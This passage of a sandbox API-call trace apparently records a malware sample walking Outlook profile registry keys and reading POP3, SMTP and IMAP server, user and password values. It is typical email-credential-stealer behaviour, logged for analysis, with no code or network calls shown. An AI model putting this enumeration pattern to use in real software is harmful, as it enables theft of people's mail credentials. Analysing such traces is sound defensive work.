(hKey=0x14c) returned 0x0 [0163.922] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x20119, phkResult=0x2dea60 | out: phkResult=0x2dea60*=0x14c) returned 0x0 [0163.922] RegQueryValueExW (in: hKey=0x14c, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x2dea64, lpData=0x0, lpcbData=0x2dea70*=0x0 | out: lpType=0x2dea64*=0x0, lpData=0x0, lpcbData=0x2dea70*=0x0) returned 0x2 [0163.922] RegCloseKey (hKey=0x14c) returned 0x0 [0163.922] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x20219, phkResult=0x2dea88 | out: phkResult=0x2dea88*=0x14c) returned 0x0 [0163.923] RegQueryValueExW (in: hKey=0x14c, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x2dea8c, lpData=0x0, lpcbData=0x2dea98*=0x0 | out: lpType=0x2dea8c*=0x0, lpData=0x0, lpcbData=0x2dea98*=0x0) returned 0x2 [0163.923] RegCloseKey (hKey=0x14c) returned 0x0 [0163.923] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x20119, phkResult=0x2dea60 | out: phkResult=0x2dea60*=0x14c) returned 0x0 [0163.923] RegQueryValueExW (in: hKey=0x14c, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x2dea64, lpData=0x0, lpcbData=0x2dea70*=0x0 | out: lpType=0x2dea64*=0x0, lpData=0x0, lpcbData=0x2dea70*=0x0) returned 0x2 [0163.923] RegCloseKey (hKey=0x14c) returned 0x0 [0163.923] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x20219, phkResult=0x2dea88 | out: phkResult=0x2dea88*=0x14c) returned 0x0 [0163.923] RegQueryValueExW (in: hKey=0x14c, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x2dea8c, lpData=0x0, lpcbData=0x2dea98*=0x0 | out: lpType=0x2dea8c*=0x0, lpData=0x0, lpcbData=0x2dea98*=0x0) returned 0x2 [0163.923] RegCloseKey (hKey=0x14c) returned 0x0 [0163.923] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x20119, phkResult=0x2dea60 | out: phkResult=0x2dea60*=0x14c) returned 0x0 [0163.923] RegQueryValueExW (in: hKey=0x14c, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x2dea64, lpData=0x0, lpcbData=0x2dea70*=0x0 | out: lpType=0x2dea64*=0x0, lpData=0x0, lpcbData=0x2dea70*=0x0) returned 0x2 [0163.923] RegCloseKey (hKey=0x14c) returned 0x0 [0163.923] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2deaa0, dwLength=0x1c | out: lpBuffer=0x2deaa0*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.923] GetProcessHeap () returned 0x8e0000 [0163.923] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.923] RegEnumKeyExW (in: hKey=0x100, dwIndex=0x1, lpName=0x2deae0, lpcchName=0x2deadc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="00000002", lpcchName=0x2deadc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0163.923] lstrlenW (lpString="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676") returned 122 [0163.923] lstrlenW (lpString="\\") returned 1 [0163.923] GetProcessHeap () returned 0x8e0000 [0163.924] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf8) returned 0x926360 [0163.924] lstrcatW (in: lpString1="", lpString2="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676" | out: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676") returned="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676" [0163.924] lstrcatW (in: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", lpString2="\\" | out: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\") returned="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\" [0163.924] lstrlenW (lpString="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\") returned 123 [0163.924] lstrlenW (lpString="00000002") returned 8 [0163.924] GetProcessHeap () returned 0x8e0000 [0163.924] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x108) returned 0x9252c8 [0163.924] lstrcatW (in: lpString1="", lpString2="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\" | out: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\") returned="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\" [0163.924] lstrcatW (in: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\", lpString2="00000002" | out: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002") returned="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002" [0163.924] VirtualQuery (in: lpAddress=0x926360, lpBuffer=0x2dea94, dwLength=0x1c | out: lpBuffer=0x2dea94*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.924] GetProcessHeap () returned 0x8e0000 [0163.924] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926360 | out: hHeap=0x8e0000) returned 1 [0163.924] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x20219, phkResult=0x2dea88 | out: phkResult=0x2dea88*=0x14c) returned 0x0 [0163.924] RegQueryValueExW (in: hKey=0x14c, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x2dea8c, lpData=0x0, lpcbData=0x2dea98*=0x0 | out: lpType=0x2dea8c*=0x0, lpData=0x0, lpcbData=0x2dea98*=0x0) returned 0x2 [0163.924] RegCloseKey (hKey=0x14c) returned 0x0 [0163.924] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x20119, phkResult=0x2dea60 | out: phkResult=0x2dea60*=0x14c) returned 0x0 [0163.924] RegQueryValueExW (in: hKey=0x14c, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x2dea64, lpData=0x0, lpcbData=0x2dea70*=0x0 | out: lpType=0x2dea64*=0x0, lpData=0x0, lpcbData=0x2dea70*=0x0) returned 0x2 [0163.924] RegCloseKey (hKey=0x14c) returned 0x0 [0163.924] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x20219, phkResult=0x2dea88 | out: phkResult=0x2dea88*=0x14c) returned 0x0 [0163.924] RegQueryValueExW (in: hKey=0x14c, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x2dea8c, lpData=0x0, lpcbData=0x2dea98*=0x0 | out: lpType=0x2dea8c*=0x0, lpData=0x0, lpcbData=0x2dea98*=0x0) returned 0x2 [0163.924] RegCloseKey (hKey=0x14c) returned 0x0 [0163.925] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x20119, phkResult=0x2dea60 | out: phkResult=0x2dea60*=0x14c) returned 0x0 [0163.925] RegQueryValueExW (in: hKey=0x14c, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x2dea64, lpData=0x0, lpcbData=0x2dea70*=0x0 | out: lpType=0x2dea64*=0x0, lpData=0x0, lpcbData=0x2dea70*=0x0) returned 0x2 [0163.925] RegCloseKey (hKey=0x14c) returned 0x0 [0163.925] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x20219, phkResult=0x2dea88 | out: phkResult=0x2dea88*=0x14c) returned 0x0 [0163.925] RegQueryValueExW (in: hKey=0x14c, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x2dea8c, lpData=0x0, lpcbData=0x2dea98*=0x0 | out: lpType=0x2dea8c*=0x0, lpData=0x0, lpcbData=0x2dea98*=0x0) returned 0x2 [0163.925] RegCloseKey (hKey=0x14c) returned 0x0 [0163.925] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x20119, phkResult=0x2dea60 | out: phkResult=0x2dea60*=0x14c) returned 0x0 [0163.925] RegQueryValueExW (in: hKey=0x14c, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x2dea64, lpData=0x0, lpcbData=0x2dea70*=0x0 | out: lpType=0x2dea64*=0x0, lpData=0x0, lpcbData=0x2dea70*=0x0) returned 0x2 [0163.925] RegCloseKey (hKey=0x14c) returned 0x0 [0163.925] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2deaa0, dwLength=0x1c | out: lpBuffer=0x2deaa0*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.925] GetProcessHeap () returned 0x8e0000 [0163.925] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.925] RegEnumKeyExW (in: hKey=0x100, dwIndex=0x2, lpName=0x2deae0, lpcchName=0x2deadc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="00000003", lpcchName=0x2deadc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0163.925] lstrlenW (lpString="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676") returned 122 [0163.925] lstrlenW (lpString="\\") returned 1 [0163.925] GetProcessHeap () returned 0x8e0000 [0163.925] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf8) returned 0x926360 [0163.925] lstrcatW (in: lpString1="", lpString2="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676" | out: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676") returned="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676" [0163.925] lstrcatW (in: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", lpString2="\\" | out: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\") returned="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\" [0163.925] lstrlenW (lpString="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\") returned 123 [0163.925] lstrlenW (lpString="00000003") returned 8 [0163.926] GetProcessHeap () returned 0x8e0000 [0163.926] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x108) returned 0x9252c8 [0163.926] lstrcatW (in: lpString1="", lpString2="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\" | out: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\") returned="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\" [0163.926] lstrcatW (in: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\", lpString2="00000003" | out: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003") returned="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003" [0163.926] VirtualQuery (in: lpAddress=0x926360, lpBuffer=0x2dea94, dwLength=0x1c | out: lpBuffer=0x2dea94*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.926] GetProcessHeap () returned 0x8e0000 [0163.926] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926360 | out: hHeap=0x8e0000) returned 1 [0163.926] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20219, phkResult=0x2dea88 | out: phkResult=0x2dea88*=0x14c) returned 0x0 [0163.926] RegQueryValueExW (in: hKey=0x14c, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x2dea8c, lpData=0x0, lpcbData=0x2dea98*=0x0 | out: lpType=0x2dea8c*=0x3, lpData=0x0, lpcbData=0x2dea98*=0xa) returned 0x0 [0163.926] GetProcessHeap () returned 0x8e0000 [0163.926] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x14) returned 0x8fe898 [0163.926] RegQueryValueExW (in: hKey=0x14c, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x0, lpData=0x8fe898, lpcbData=0x2dea98*=0xa | out: lpType=0x0, lpData=0x8fe898*=0x64, lpcbData=0x2dea98*=0xa) returned 0x0 [0163.926] RegCloseKey (hKey=0x14c) returned 0x0 [0163.926] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20219, phkResult=0x2dea88 | out: phkResult=0x2dea88*=0x14c) returned 0x0 [0163.926] RegQueryValueExW (in: hKey=0x14c, lpValueName="POP3 Port", lpReserved=0x0, lpType=0x2dea8c, lpData=0x0, lpcbData=0x2dea98*=0x2deab0 | out: lpType=0x2dea8c*=0x0, lpData=0x0, lpcbData=0x2dea98*=0x0) returned 0x2 [0163.926] RegCloseKey (hKey=0x14c) returned 0x0 [0163.926] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20119, phkResult=0x2dea60 | out: phkResult=0x2dea60*=0x14c) returned 0x0 [0163.926] RegQueryValueExW (in: hKey=0x14c, lpValueName="POP3 Port", lpReserved=0x0, lpType=0x2dea64, lpData=0x0, lpcbData=0x2dea70*=0x2deab0 | out: lpType=0x2dea64*=0x0, lpData=0x0, lpcbData=0x2dea70*=0x0) returned 0x2 [0163.926] RegCloseKey (hKey=0x14c) returned 0x0 [0163.926] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20219, phkResult=0x2dea88 | out: phkResult=0x2dea88*=0x14c) returned 0x0 [0163.927] RegQueryValueExW (in: hKey=0x14c, lpValueName="POP3 User", lpReserved=0x0, lpType=0x2dea8c, lpData=0x0, lpcbData=0x2dea98*=0x2deab0 | out: lpType=0x2dea8c*=0x3, lpData=0x0, lpcbData=0x2dea98*=0xe) returned 0x0 [0163.927] GetProcessHeap () returned 0x8e0000 [0163.927] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1c) returned 0x90a2b0 [0163.927] RegQueryValueExW (in: hKey=0x14c, lpValueName="POP3 User", lpReserved=0x0, lpType=0x0, lpData=0x90a2b0, lpcbData=0x2dea98*=0xe | out: lpType=0x0, lpData=0x90a2b0*=0x76, lpcbData=0x2dea98*=0xe) returned 0x0 [0163.927] RegCloseKey (hKey=0x14c) returned 0x0 [0163.927] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20219, phkResult=0x2dea88 | out: phkResult=0x2dea88*=0x14c) returned 0x0 [0163.927] RegQueryValueExW (in: hKey=0x14c, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x2dea8c, lpData=0x0, lpcbData=0x2dea98*=0x2deab0 | out: lpType=0x2dea8c*=0x0, lpData=0x0, lpcbData=0x2dea98*=0x0) returned 0x2 [0163.927] RegCloseKey (hKey=0x14c) returned 0x0 [0163.927] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20119, phkResult=0x2dea60 | out: phkResult=0x2dea60*=0x14c) returned 0x0 [0163.927] RegQueryValueExW (in: hKey=0x14c, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x2dea64, lpData=0x0, lpcbData=0x2dea70*=0x2deab0 | out: lpType=0x2dea64*=0x0, lpData=0x0, lpcbData=0x2dea70*=0x0) returned 0x2 [0163.927] RegCloseKey (hKey=0x14c) returned 0x0 [0163.927] VirtualQuery (in: lpAddress=0x8fe898, lpBuffer=0x2dea74, dwLength=0x1c | out: lpBuffer=0x2dea74*(BaseAddress=0x8fe000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x29000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.927] GetProcessHeap () returned 0x8e0000 [0163.927] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fe898 | out: hHeap=0x8e0000) returned 1 [0163.927] VirtualQuery (in: lpAddress=0x90a2b0, lpBuffer=0x2dea74, dwLength=0x1c | out: lpBuffer=0x2dea74*(BaseAddress=0x90a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1d000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.927] GetProcessHeap () returned 0x8e0000 [0163.927] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x90a2b0 | out: hHeap=0x8e0000) returned 1 [0163.927] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20219, phkResult=0x2dea88 | out: phkResult=0x2dea88*=0x14c) returned 0x0 [0163.927] RegQueryValueExW (in: hKey=0x14c, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x2dea8c, lpData=0x0, lpcbData=0x2dea98*=0x0 | out: lpType=0x2dea8c*=0x3, lpData=0x0, lpcbData=0x2dea98*=0xc) returned 0x0 [0163.928] GetProcessHeap () returned 0x8e0000 [0163.928] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x18) returned 0x8fe898 [0163.928] RegQueryValueExW (in: hKey=0x14c, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0x8fe898, lpcbData=0x2dea98*=0xc | out: lpType=0x0, lpData=0x8fe898*=0x67, lpcbData=0x2dea98*=0xc) returned 0x0 [0163.928] RegCloseKey (hKey=0x14c) returned 0x0 [0163.928] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20219, phkResult=0x2dea88 | out: phkResult=0x2dea88*=0x14c) returned 0x0 [0163.928] RegQueryValueExW (in: hKey=0x14c, lpValueName="SMTP Port", lpReserved=0x0, lpType=0x2dea8c, lpData=0x0, lpcbData=0x2dea98*=0x2deab0 | out: lpType=0x2dea8c*=0x0, lpData=0x0, lpcbData=0x2dea98*=0x0) returned 0x2 [0163.928] RegCloseKey (hKey=0x14c) returned 0x0 [0163.928] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20119, phkResult=0x2dea60 | out: phkResult=0x2dea60*=0x14c) returned 0x0 [0163.928] RegQueryValueExW (in: hKey=0x14c, lpValueName="SMTP Port", lpReserved=0x0, lpType=0x2dea64, lpData=0x0, lpcbData=0x2dea70*=0x2deab0 | out: lpType=0x2dea64*=0x0, lpData=0x0, lpcbData=0x2dea70*=0x0) returned 0x2 [0163.928] RegCloseKey (hKey=0x14c) returned 0x0 [0163.928] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20219, phkResult=0x2dea88 | out: phkResult=0x2dea88*=0x14c) returned 0x0 [0163.928] RegQueryValueExW (in: hKey=0x14c, lpValueName="SMTP User", lpReserved=0x0, lpType=0x2dea8c, lpData=0x0, lpcbData=0x2dea98*=0x2deab0 | out: lpType=0x2dea8c*=0x0, lpData=0x0, lpcbData=0x2dea98*=0x0) returned 0x2 [0163.928] RegCloseKey (hKey=0x14c) returned 0x0 [0163.928] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20119, phkResult=0x2dea60 | out: phkResult=0x2dea60*=0x14c) returned 0x0 [0163.928] RegQueryValueExW (in: hKey=0x14c, lpValueName="SMTP User", lpReserved=0x0, lpType=0x2dea64, lpData=0x0, lpcbData=0x2dea70*=0x2deab0 | out: lpType=0x2dea64*=0x0, lpData=0x0, lpcbData=0x2dea70*=0x0) returned 0x2 [0163.928] RegCloseKey (hKey=0x14c) returned 0x0 [0163.929] VirtualQuery (in: lpAddress=0x8fe898, lpBuffer=0x2dea74, dwLength=0x1c | out: lpBuffer=0x2dea74*(BaseAddress=0x8fe000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x29000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.929] GetProcessHeap () returned 0x8e0000 [0163.929] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fe898 | out: hHeap=0x8e0000) returned 1 [0163.929] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20219, phkResult=0x2dea88 | out: phkResult=0x2dea88*=0x14c) returned 0x0 [0163.929] RegQueryValueExW (in: hKey=0x14c, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x2dea8c, lpData=0x0, lpcbData=0x2dea98*=0x0 | out: lpType=0x2dea8c*=0x0, lpData=0x0, lpcbData=0x2dea98*=0x0) returned 0x2 [0163.929] RegCloseKey (hKey=0x14c) returned 0x0 [0163.929] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20119, phkResult=0x2dea60 | out: phkResult=0x2dea60*=0x14c) returned 0x0 [0163.929] RegQueryValueExW (in: hKey=0x14c, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x2dea64, lpData=0x0, lpcbData=0x2dea70*=0x0 | out: lpType=0x2dea64*=0x0, lpData=0x0, lpcbData=0x2dea70*=0x0) returned 0x2 [0163.929] RegCloseKey (hKey=0x14c) returned 0x0 [0163.929] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2deaa0, dwLength=0x1c | out: lpBuffer=0x2deaa0*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.929] GetProcessHeap () returned 0x8e0000 [0163.929] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.929] RegEnumKeyExW (in: hKey=0x100, dwIndex=0x3, lpName=0x2deae0, lpcchName=0x2deadc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="00000004", lpcchName=0x2deadc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0163.929] lstrlenW (lpString="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676") returned 122 [0163.929] lstrlenW (lpString="\\") returned 1 [0163.929] GetProcessHeap () returned 0x8e0000 [0163.929] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf8) returned 0x926360 [0163.929] lstrcatW (in: lpString1="", lpString2="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676" | out: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676") returned="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676" [0163.929] lstrcatW (in: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", lpString2="\\" | out: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging 